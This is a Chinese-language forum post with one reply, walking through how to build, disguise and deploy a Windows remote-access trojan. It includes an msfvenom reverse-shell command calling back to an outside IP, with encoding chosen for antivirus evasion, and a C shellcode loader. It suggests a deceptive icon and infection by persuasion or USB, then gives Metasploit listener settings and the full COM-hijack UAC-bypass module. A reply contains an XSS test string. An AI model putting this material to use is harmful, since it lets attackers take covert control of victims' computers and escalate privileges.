找回密码
快捷导航
    1.实现内网穿透的办法         a.免费的 ngrok (URL:https://ngrok.com/)         ngrok 是一个免费的内网穿透的,但是正因为免费,所以使用他的时候有一些小的弊端。

        弊端:每次使用都要更改 LHOST 和 LPORT (这两个都是随机值)

    操作步骤如下:
        1.首先注册一个账号(我是使用的Github账号)
    2.首先登陆到 https://ngrok.com/download(ngrok)的下载页面
    3.选择匹配自己机子的安装包进行下载
    4.进行解压缩  
        unzip /path/to/ngrok.zip
          和
      输入自己的验证
          ./ngrok authtoken  自己的账号的验证 (https://dashboard.ngrok.com/auth
    5.以上步骤都操作完成之后,输入 ./ngrok tcp 1234,如果出现如下的图就算是成功了
    6.为了得到分配的IP,使用Ping ngrok的域名
        ping  0.tcp.ngrok.io

        b.购买一台服务器搭建MSF    这个就不详细说明了。(以后再续)        2.木马的伪装和简单的免杀         a.介绍     木马面临的最基本的问题就是免杀,如果不能免杀,被杀毒软件发现,其作用几乎为零,至于怎么感染别人,就得看你的忽悠能力或者USB的方式,但是首要的应该是免杀]。 我采用的是比较简单的免杀方式,依靠msf生成的shellcode免杀。

        b.利用 msfvenom 生成简单的 shellcode.c文件 msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=52.14.61.47 LPORT=13098 -e x86/shikata_ga_nai -i 15 PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/Desktop/shellcode.c
        对上进行说明:
        这里的paylload选择 windows/meterpreter/reverse_tcp,LHOST和LPORT分别填ngrok给你的网址和端口,-e x86/shikata_ga_nai -i 15是用-e x86/shikata_ga_nai编码15次,而PrependMigrate=true PrependMigrateProc=svchost.exe使这个程序默认会迁移到svchost.exe进程
    自己测试的时候不建议到这个进程而是其他的持久进程,这样别人打开之后就无法再常规的去关闭回连的会话。你还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力
        c.编译木马

        在visual studio下新建一个c++的win32项目将以下代码模板复制进去,在把你得到的shellcode那长串数字复制到shellcode的位置。
        // ConsoleApplication1.cpp : 定义控制台应用程序的入口点。
//

#include "stdio.h"
#include "Windows.h"

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")                        //去除窗口
unsigned char shellcode[] =
步骤b所在桌面产生的 shellcode.c的内容;


void main()
   
{
        //ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);
        LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        memcpy(Memory, shellcode, sizeof(shellcode));
        ((void(*)())Memory)();
}

编译方法网上有很多种,这个时候已经可以编译了,但是我们还可以对图标进行更改伪装:右击你的项目—>添加—>资源—>图标—>新建,然后自己可以在网上找到图片来替换掉图标以达到相应的迷惑性.

    注:http://www.bitbug.net/ 这个网站可以将我们的普通图片转换为 *.icon

        3.meterpreter后渗透功能测试         a.设置好监听端         i:使用ngrok的监听设置 use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 1234
exploit

        ii:使用自己的服务器的监听设置
        use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 服务器NAT的地址
set LPORT
exploit

2.png         
QQ图片20180910125544.png
        4.进行system提权 使用bypass_comhijack Exploit绕过Windows 10中的UAC

        a.要执行此攻击,您需要在metasploit框架内手动添加bypass_comhijack漏洞。         i:vim  bypass_comhijack.rb,将如下的内容复制进去
        ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas
  include Exploit::FileDropper

  CLSID_PATH       = "HKCU\\Software\\Classes\\CLSID"
  DEFAULT_VAL_NAME = '' # This maps to "(Default)"

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)',
      'Description'   => %q{
        This module will bypass Windows UAC by creating COM handler registry entries in the
        HKCU hive. When certain high integrity processes are loaded, these registry entries
        are referenced resulting in the process loading user-controlled DLLs. These DLLs
        contain the payloads that result in elevated sessions. Registry key modifications
        are cleaned up after payload invocation.

        This module requires the architecture of the payload to match the OS, but the
        current low-privilege Meterpreter session architecture can be different. If
        specifying EXE::Custom your DLL should call ExitProcess() after starting your
        payload in a separate process.

        This module invokes the target binary via cmd.exe on the target. Therefore if
        cmd.exe access is restricted, this module will not run correctly.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
          'Matt Nelson',    # UAC bypass discovery and research
          'b33f',           # UAC bypass discovery and research
          'OJ Reeves'       # MSF module
        ],
      'Platform'      => ['win'],
      'SessionTypes'  => ['meterpreter'],
      'Targets'       => [
          ['Automatic', {}]
      ],
      'DefaultTarget' => 0,
      'References'    => [
        [
          'URL', 'https://www.youtube.com/watch?v=3gz1QmiHhss',
          'URL', 'https://wikileaks.org/ciav7p1/cms/page_13763373.html',
          'URL', 'https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf',
        ]
      ],
      'DisclosureDate'=> 'Jan 01 1900'
    ))
  end

  def check
    if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] != payload_instance.arch.first
      fail_with(Failure::BadConfig, "#{payload_instance.arch.first} payload selected for #{sysinfo['Architecture']} system")
    end

    registry_view = REGISTRY_VIEW_NATIVE
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      registry_view = REGISTRY_VIEW_64_BIT
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    case get_uac_level
      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
        fail_with(Failure::NotVulnerable,
                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
        )
      when UAC_DEFAULT
        print_good('UAC is set to Default')
        print_good('BypassUAC can bypass this setting, continuing...')
      when UAC_NO_PROMPT
        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
        shell_execute_exe
        return
    end

    payload = generate_payload_dll({:dll_exitprocess => true})
    commspec = expand_path('%COMSPEC%')
    dll_name = expand_path("%TEMP%\\#{rand_text_alpha(8)}.dll")
    hijack = hijack_com(registry_view, dll_name)

    unless hijack && hijack[:cmd_path]
      fail_with(Failure::Unknown, 'Unable to hijack COM')
    end

    begin
      print_status("Targeting #{hijack[:name]} via #{hijack[:root_key]} ...")
      print_status("Uploading payload to #{dll_name} ...")
      write_file(dll_name, payload)
      register_file_for_cleanup(dll_name)

      print_status("Executing high integrity process ...")
      args = "/c #{expand_path(hijack[:cmd_path])}"
      args << " #{hijack[:cmd_args]}" if hijack[:cmd_args]

      # Launch the application from cmd.exe instead of directly so that we can
      # avoid the dreaded 740 error (elevation requried)
      client.sys.process.execute(commspec, args, {'Hidden' => true})

      # Wait a copule of seconds to give the payload a chance to fire before cleaning up
      Rex::sleep(5)

      handler(client)

    ensure
      print_status("Cleaining up registry ...")
      registry_deletekey(hijack[:root_key], registry_view)
    end
  end

  # TODO: Add more hijack points when they're known.
  # TODO: when more class IDs are found for individual hijackpoints
  # they can be added to the array of class IDs.
  @@hijack_points = [
    {
      name: 'Event Viewer',
      cmd_path: '%WINDIR%\System32\eventvwr.exe',
      class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
    },
    {
      name: 'Computer Managment',
      cmd_path: '%WINDIR%\System32\mmc.exe',
      cmd_args: 'CompMgmt.msc',
      class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
    }
  ]

  #
  # Perform the hijacking of COM class IDS. This function chooses a random
  # application target and a random class id associated with it before
  # modifying the registry.
  #
  def hijack_com(registry_view, dll_path)
    target = @@hijack_points.sample
    target_clsid = target[:class_ids].sample
    root_key = "#{CLSID_PATH}\\{#{target_clsid}}"
    inproc_key = "#{root_key}\\InProcServer32"
    shell_key = "#{root_key}\\ShellFolder"

    registry_createkey(root_key, registry_view)
    registry_createkey(inproc_key, registry_view)
    registry_createkey(shell_key, registry_view)

    registry_setvaldata(inproc_key, DEFAULT_VAL_NAME, dll_path, 'REG_SZ', registry_view)
    registry_setvaldata(inproc_key, 'ThreadingModel', 'Apartment', 'REG_SZ', registry_view)
    registry_setvaldata(inproc_key, 'LoadWithoutCOM', '', 'REG_SZ', registry_view)
    registry_setvaldata(shell_key, 'HideOnDesktop', '', 'REG_SZ', registry_view)
    registry_setvaldata(shell_key, 'Attributes', 0xf090013d, 'REG_DWORD', registry_view)

    {
      name:     target[:name],
      cmd_path: target[:cmd_path],
      cmd_args: target[:cmd_args],
      root_key: root_key
    }
  end

  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end

    unless is_in_admin_group?
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    print_status('UAC is Enabled, checking level...')
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end

        ii:复制 “bypass_comhijack” 到 usr>share>metasploit_framework>modules>exploit>windows>local这个路径中         b.设置监听 use exploit/windows/local/bypassuac_comhijack
set payload window/x64/meterpreter/reverse_tcp
set session 1
set lhost 自己的IP
set lport 自己的端口
exploit
他没有一个有个性的自我介绍,你们不要理他!
  • TA的每日心情

    3 天前
  • 签到天数: 38 天

    连续签到: 1 天

    [LV.5]常住居民I

    0

    主题

    9

    帖子

    256

    积分

    新手白帽

    Rank: 1

    积分
    256
    QQ
    发表于 2018-9-13 09:17:22 | 显示全部楼层
    沙发
    工具给满分,排版给0分
    "><script>alert(1)</script>
      您需要登录后才可以回帖 登录 | 立即注册

      本版积分规则

      Powered by Discuz! X3.4  © 2001-2013 Comsenz Inc.